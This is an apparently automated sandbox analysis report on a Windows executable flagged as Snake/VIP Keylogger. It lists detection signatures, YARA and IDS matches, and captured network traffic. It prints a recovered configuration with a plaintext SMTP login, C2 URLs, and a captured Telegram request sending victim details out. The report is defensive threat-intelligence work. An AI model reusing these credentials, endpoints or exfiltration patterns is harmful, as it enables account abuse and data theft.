Windows Analysis Report
z64BLPL.exe

Overview

General Information

Sample name: z64BLPL.exe
Analysis ID: 1519553
MD5: 9c7cf85d2fa1d9c0b6c591b94cbf2830
SHA1: 55822a8ed3ceda0fc325d998af2e379fb05a948e
SHA256: fe777d4ff348afb74ba7556da56b29a4ee0a66f7b044674fd1f18641573337f2
Tags: exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: z64BLPL.exe Avira: detected
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 0.0.z64BLPL.exe.690000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: z64BLPL.exe ReversingLabs: Detection: 73%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: z64BLPL.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: z64BLPL.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: z64BLPL.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 00D3F2D5h 0_2_00D3F138
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 00D3F2D5h 0_2_00D3F324
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 00D3FA91h 0_2_00D3F7EC
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06693360h 0_2_06692F48
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06690D0Dh 0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06691697h 0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06692C21h 0_2_06692970
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669D0C9h 0_2_0669CE20
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669D979h 0_2_0669D6D0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06693360h 0_2_06692F37
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669E229h 0_2_0669DF80
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669EF31h 0_2_0669EC88
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669F7E1h 0_2_0669F538
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669D521h 0_2_0669D278
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 06693360h 0_2_0669328E
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669DDD1h 0_2_0669DB28
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669E681h 0_2_0669E3D8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 0_2_06690040
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669EAD9h 0_2_0669E830
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669F389h 0_2_0669F0E0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 4x nop then jmp 0669FC39h 0_2_0669F990

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CNSV-LLCUS CNSV-LLCUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.electradubai.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 15:10:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: z64BLPL.exe String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: z64BLPL.exe String found in binary or memory: http://aborters.duckdns.org:8081
Source: z64BLPL.exe String found in binary or memory: http://anotherarmy.dns.army:8081
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: z64BLPL.exe String found in binary or memory: http://checkip.dyndns.org/q
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.electradubai.com
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z64BLPL.exe String found in binary or memory: http://varders.kozow.com:8081
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: z64BLPL.exe String found in binary or memory: https://api.telegram.org/bot
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: z64BLPL.exe String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: z64BLPL.exe, type: SAMPLE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: z64BLPL.exe, type: SAMPLE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: z64BLPL.exe, type: SAMPLE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\z64BLPL.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00BFC571 0_2_00BFC571
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00BF268C 0_2_00BF268C
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00BF5708 0_2_00BF5708
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3A088 0_2_00D3A088
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3C146 0_2_00D3C146
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D37118 0_2_00D37118
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3D2CB 0_2_00D3D2CB
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D35362 0_2_00D35362
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3C468 0_2_00D3C468
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3D599 0_2_00D3D599
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3C738 0_2_00D3C738
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D369A0 0_2_00D369A0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3EAA8 0_2_00D3EAA8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3FC37 0_2_00D3FC37
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3CD28 0_2_00D3CD28
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3CFF7 0_2_00D3CFF7
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3F7EC 0_2_00D3F7EC
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D339ED 0_2_00D339ED
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D329EC 0_2_00D329EC
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D3EA9B 0_2_00D3EA9B
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D33AA1 0_2_00D33AA1
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_00D33E09 0_2_00D33E09
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_066996C8 0_2_066996C8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06699DF0 0_2_06699DF0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06692288 0_2_06692288
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06690B30 0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06691BA8 0_2_06691BA8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06692970 0_2_06692970
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_066951A8 0_2_066951A8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669CE20 0_2_0669CE20
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669CE0F 0_2_0669CE0F
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669D6C0 0_2_0669D6C0
